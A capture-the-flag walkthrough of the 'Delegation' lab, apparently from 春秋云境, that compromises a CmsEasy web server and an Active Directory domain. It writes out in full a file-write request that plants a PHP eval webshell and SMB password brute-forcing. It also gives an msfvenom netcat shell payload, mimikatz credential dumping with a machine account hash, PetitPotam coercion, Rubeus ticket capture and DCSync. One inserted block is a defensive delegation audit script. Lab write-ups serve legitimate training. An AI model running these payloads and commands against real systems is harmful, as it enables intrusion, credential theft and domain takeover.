春秋云境 - Delegation - Writeup

fscan scan

39.99.159.97:3306 open
39.99.159.97:80 open
39.99.159.97:21 open
39.99.159.97:22 open

Port 80 is running CmsEasy 7_7_5_20210919_UTF8

Weak admin panel credentials: admin / 123456

This version has an arbitrary file write vulnerability

POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.99.159.97
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=0584gim8624f3gjc417is5vsd5; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

sid=#data_d_.._d_.._d_.._d_1.php&slen=693&scontent=<?php eval($_REQUEST[1]);phpinfo();?>

SUID privilege escalation gives the first flag

A hint is given:

Here is the hint: WIN19\Adrian
I'll do whatever I can to rock you...

Run fscan on the internal network

172.22.4.7  DC01.xiaorang.lab
172.22.4.19 FILESERVER.xiaorang.lab
172.22.4.36 (already compromised)
172.22.4.45 XIAORANG\WIN19

Try brute-forcing the Adrian user

➜ proxychains4 -q cme smb 172.22.4.45 -d WIN19 -u Adrian -p rockyou.txt

Result:

WIN19\Adrian:babygirl1

RDP straight in

PrivescCheck is on the desktop, along with its HTML results file. Very considerate.

The current user has write permission on the HKLM\SYSTEM\CurrentControlSet\Services\gupdate registry key, and can start and stop the gupdate service

Modify ImagePath, then start the service

But for some reason the shell didn't come back

Try bouncing the shell to localhost instead

msfvenom -p windows/x64/exec cmd='C:\temp\nc64.exe 127.0.0.1 2333 -e cmd.exe' --platform windows -f exe-service > a.exe

Got the second flag

Dump hashes

load kiwi
creds_all

Got the machine account hash

proxychains4 -q findDelegation.py xiaorang.lab/'WIN19$' -hashes :d131def22fd09c35b544caa6068f5d5f  -dc-ip 172.22.4.7

Unconstrained delegation is configured
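What the box hinges on is a non-DC machine account (WIN19$) trusted for unconstrained delegation. As an added example that is not part of this writeup, the Python below audits userAccountControl flags the way a defender would, over constructed records; the flag constants are the documented UF_* values, and every sample account other than DC01$ and WIN19$ is invented.

```python
# Added example, not from the original writeup: audit AD accounts for the
# delegation misconfiguration this box abuses. Records are constructed to
# look like LDAP attributes (real data would come from an LDAP search).
UF_SERVER_TRUST_ACCOUNT = 0x2000           # set on domain controllers
UF_TRUSTED_FOR_DELEGATION = 0x80000        # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                # "sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained + protocol transition

def delegation_findings(records):
    """(sAMAccountName, severity, reason) for risky delegation settings.
    DCs are skipped: they legitimately carry TRUSTED_FOR_DELEGATION."""
    findings = []
    for rec in records:
        uac, name = int(rec["userAccountControl"]), rec["sAMAccountName"]
        if uac & UF_SERVER_TRUST_ACCOUNT:
            continue
        if uac & UF_TRUSTED_FOR_DELEGATION:
            findings.append((name, "high", "unconstrained delegation on a non-DC"))
        elif uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append((name, "medium", "constrained delegation with protocol transition"))
        elif rec.get("msDS-AllowedToDelegateTo"):
            spns = ", ".join(rec["msDS-AllowedToDelegateTo"])
            findings.append((name, "low", "constrained delegation to " + spns))
    return findings

def unprotected_admins(records, admin_group="Domain Admins"):
    """Privileged users whose TGT would still be cached on a compromised
    unconstrained-delegation host: neither NOT_DELEGATED nor Protected Users."""
    out = []
    for rec in records:
        groups = rec.get("memberOf", [])
        if admin_group not in groups or "Protected Users" in groups:
            continue
        if not int(rec["userAccountControl"]) & UF_NOT_DELEGATED:
            out.append(rec["sAMAccountName"])
    return out

# Constructed sample: DC01$ and WIN19$ mirror this lab's hosts; APP01$ and the
# two user accounts are invented for illustration.
SAMPLE = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000},
    {"sAMAccountName": "WIN19$", "userAccountControl": 0x81000},
    {"sAMAccountName": "APP01$", "userAccountControl": 0x1000,
     "msDS-AllowedToDelegateTo": ["cifs/app01.xiaorang.lab"]},
    {"sAMAccountName": "administrator", "userAccountControl": 0x200,
     "memberOf": ["Domain Admins"]},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x100200,
     "memberOf": ["Domain Admins"]},
]
```

Remediating the high finding means clearing the flag on WIN19$ (or moving to constrained or resource-based delegation); marking privileged accounts as sensitive or placing them in Protected Users stops their TGTs from being harvested even if such a host is compromised.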

Start Rubeus to harvest tickets every second

Rubeus.exe monitor /interval:1 /filteruser:DC01$

SpoolSample, PetitPotam or DFSCoerce can be used to coerce the DC into authenticating

proxychains4 python3 PetitPotam.py -u 'WIN19$' -hashes :d131def22fd09c35b544caa6068f5d5f -d xiaorang.lab -dc-ip 172.22.4.7 WIN19.xiaorang.lab DC01.xiaorang.lab

(Don't forget to edit /etc/hosts)

Rubeus now receives the TGT

Decode it, load the ticket in mimikatz, then DCSync the domain admin

kerberos::ptt ticket.kirbi

lsadump::dcsync /domain:xiaorang.lab /user:administrator

PsExec laterally to the remaining two machines to get the last two flags